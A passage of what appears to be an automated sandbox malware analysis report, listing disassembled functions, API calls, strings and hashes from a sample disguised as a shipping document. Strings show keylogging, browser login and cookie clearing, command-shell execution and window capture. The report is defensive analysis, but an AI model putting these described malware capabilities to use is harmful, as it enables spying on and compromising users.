                                                        • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                      • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                      • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                      • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread$LocalTime$wsprintf
                                                      • String ID: Online Keylogger Started
                                                      • API String ID: 112202259-1258561607
                                                      • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                      • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                      • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                      • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                      Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                      • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                      • __dosmaperr.LIBCMT ref: 0044AAFE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                      • String ID: `@
                                                      • API String ID: 2583163307-951712118
                                                      • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                      • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                      • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                      • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                      Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00404946
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                      • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                      Strings
                                                      • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$EventLocalThreadTime
                                                      • String ID: KeepAlive | Enabled | Timeout:
                                                      • API String ID: 2532271599-1507639952
                                                      • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                      • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                      • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                      • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                      Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                      • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                      • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseEventHandleObjectSingleWait
                                                      • String ID: Connection Timeout
                                                      • API String ID: 2055531096-499159329
                                                      • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                      • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                      • Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                      • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                      Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                        • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                        • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                      • String ID: bad locale name
                                                      • API String ID: 3628047217-1405518554
                                                      • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                      • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                      • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                      • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                      Function 004126D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                      • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                      • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: Control Panel\Desktop
                                                      • API String ID: 1818849710-27424756
                                                      • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                      • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                      • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                      • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                      Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                      • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID: TUF
                                                      • API String ID: 1818849710-3431404234
                                                      • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                      • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                      • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                      • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                      Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExecuteShell
                                                      • String ID: /C $cmd.exe$open
                                                      • API String ID: 587946157-3896048727
                                                      • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                      • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                      • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                      • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                      Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: GetCursorInfo$User32.dll
                                                      • API String ID: 1646373207-2714051624
                                                      • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                      • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                      • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                      • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                      Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetLastInputInfo$User32.dll
                                                      • API String ID: 2574300362-1519888992
                                                      • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                      • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                      • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                      • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                      Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                      • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                      • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                      • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                      Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                      • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                      • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                      • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                      Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                      • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                      • CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 3360349984-0
                                                      • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                      • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                      • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                      • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                      Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                      • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                      • API String ID: 3472027048-1236744412
                                                      • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                      • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                      • Opcode Fuzzy Hash: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                      • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                      Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                        • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                        • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                      • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQuerySleepValue
                                                      • String ID: @CG$exepath$BG
                                                      • API String ID: 4119054056-3221201242
                                                      • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                      • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                      • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                      • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                      Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                        • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                        • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                      • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                      • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$SleepText$ForegroundLength
                                                      • String ID: [ $ ]
                                                      • API String ID: 3309952895-93608704
                                                      • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                      • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                      • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                      • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                      Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                      • String ID:
                                                      • API String ID: 3604237281-0
                                                      • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                      • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                      • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                      • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                      Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                      • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                      • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                      • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                      Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                      • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                      • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                      • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                      Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                        • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                        • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                      • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                      • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                      • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                      • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                      Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                      • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                      • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                      • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
